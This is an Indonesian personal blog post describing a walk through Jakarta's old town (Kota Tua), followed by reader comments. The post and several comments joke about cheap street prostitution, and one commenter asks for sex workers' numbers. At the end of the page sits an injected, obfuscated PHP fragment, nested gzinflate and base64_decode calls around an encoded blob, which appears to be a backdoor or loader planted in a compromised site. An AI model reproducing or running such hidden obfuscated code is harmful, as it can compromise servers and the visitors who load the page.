Delicious

Archives

Categories

Jakarta-Kota-Tua

  ozzie / 03/04/2007


Sering banget dapet pertanyaan “Kuliah dimana sihh looo?;)) mEmang penting ya??? :-/:-/ mungkin gw gak pernah mau jawab/cerita :P:P:P. soalnya menurut gue sama aja kuliah dimana2 ;)) tergantung NIAT ama TEMEN MAIN dan tampang dosen =))=))8-}… gak ngaruh mao di Negeri ato Swasta… ato yang ber-MEREK yang katanya proses masuknya susah 8->8-> tapi gue gak tertarik tuh ;)), dan berhubung gue masih jadi mahasiswa dan mungkin Bapak-bapak/Ibu-ibu yang pernah ngalamin masa Kuliah???? :>:> pasti tau dong kelakuan mahasiswa/i yg bisa dapet nilai GEDE dengan GPA yang WOW8->8-> hingga dapet beasiswa segala :-s:-s, tapi kalo Skill diadu…. 8-}8-}8-} jadi LOYO=))=))=)) … dan kurikulum, silabus, menu yang udah BASI.. dan birokrasi beberapa Perguruan Tinggi yg sok DISIPLIN #-o#-o.. maap ^:)^ ^:)^ buat para ABG-ABG yang masih doyan ngikutin Mode, para Ayam kampus yang Sok MAHAL (liat standar harga di luar dong :)) ), para pecandu, pemakai, pengedar dan pemasok ;)) bukan maksud melecehkan cita-cita :D :-t hallahhh :-j:-j:-j …. pokoknya kalo mo Nyari dari stasiun jakarta kota (beos), gak jauh jaraknya :D dan sepanjang jalan banyak dihiasi bangunan-bangunan tua jaman dulu yang masih kokoh tak terawat. :-s
Jakarta Kota
Jakarta Kota
yang ini di seberang stasiun kota, depan/samping musium bank mandiri.

Jakarta Kota
lalu ketemu jl. kali besar.. tapi sangat disayangkan kondisi (Warna, Bau) kalinya sangat memprihatinkan :-s:-s… tapi kalo malam rame para JABLAY ;)) murah-murah kok :>:>
(tapi belon termasuk harga buka kamar ;)) )..

Jakarta Kota
setelah nyebrang ada perempatan yg menuju Telkom Kota.


Jakarta Kota
ini daerah terminal kota tua…. yg dulu katanya tempat VOC jualan.. [jualan apa nyari jablay?? :-?? :-?? ]

Jakarta Kota
ini di musium fatahillah.. tiap sore biasa nongkrong disini. cukup rame pengunjung nya dari lokal maupun internasional. apalagi kalo ujian kebagian jatah malem, pasti nongkrong di sini sambil menunggu waktu ujian dan menunggu kereta malam, sekalian main billiard di depan musim samping kantor pos kota. cukup aman kok disini,<:-p<:-p<:-p walaupun aksi premanisme masih ada ;).. Tapi ntu semua tergantung pengunjung =))=))=))


« »


13 Responses to “Jakarta-Kota-Tua”

  1. Iqbal Says:

    walah kecil2 tau jablay … jangan2 kamu pelanggan tetap yah atau germo nya … ckckckck .. dosa ji dosa !

  2. erry Says:

    Waduh, mantaf oy foto2nya. Pernah jadi tour guide dimana mas ;)) . BTW kapan2 diajak tour dong mau kenal lebih jauh tentang batavia. hehehehehe

  3. achie Says:

    Halaaaahh… hare gene masih ngomongin Jablay..mangnya dah pernah ngerasain om ;)) dengernya aja gw ga tega..:D hihihihihi.. tapi.. pas gw tanya langsung dia bilang..”katanyaaa siiiy…” jadi.. mana yang bener neh ??!:D .. gpp sih.. alhamdulillah kalo belom pernah..hehe.. jadi tambah sayang deh sama unyil yang satu ini.. ‘badung alusss..’;)).

  4. meong Says:

    huahahahahahahahahahahahaha…..
    unyil =)) =)) =))

    sadis banget a13 kasih id nya…….. :))

  5. ozzie Says:

    wkwkwkwkw =))=))=))=))
    :p:p:P:P:P:P

  6. adi Says:

    zie gmbr stmik ko di munnculin sih…
    km bnyk tau tentang perkembangan IT sering shar ma temen2 di kmps ga?

  7. Soel Says:

    emanngnye jaman kompeni udeh ade tuh jablay….wah 2x, eh gw pernah lewat di jembatan kota itan, masih bagus seh tapi ngeliat gedung sebelahnye kontras banget deh, mo rubu.
    klo bangunan kuno di deket daerah gw juga ade tuh…, kuno banget , gentengnye dari deple (BTW punye bahase), trus dindingnye deh kusam dibikin dari kayu jadul. atepnye dari sirap, kuno dah ampir mo’ rubu, name bangunannye Rumah Bang Ucup, sebelahnye juge ade kandang sampi yang udeh ambruk.

  8. Ank's Says:

    w Minta Gambar Tentang Jakarta Or sejarahnya Yang lebih Banyak Dong……….

  9. Udhel Says:

    Eh… Klo blh tau jablay mna nich yg mda2… Klo ada sich… Mnta nope’y… Isenk ajech..

  10. mr.night Says:

    waduh… murahnya berapa tuh om?

    pas nya aja deh hahahahahahaha

  11. siput Says:

    hmmmm seru juga liputannya…

    wah Q telat nhe tau artikel ini..
    rencananya sabtu besok Q mo kesana ma tmn2 Q jadi sebelumnya Q hunting dulu dehh

    kapan2 ajak2 dunk klo mo jalan2 lagy di kota tua..

  12. siput Says:

    ya iaylah nunguu di app

  13. siput Says:

    da yang lagi OL ga


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>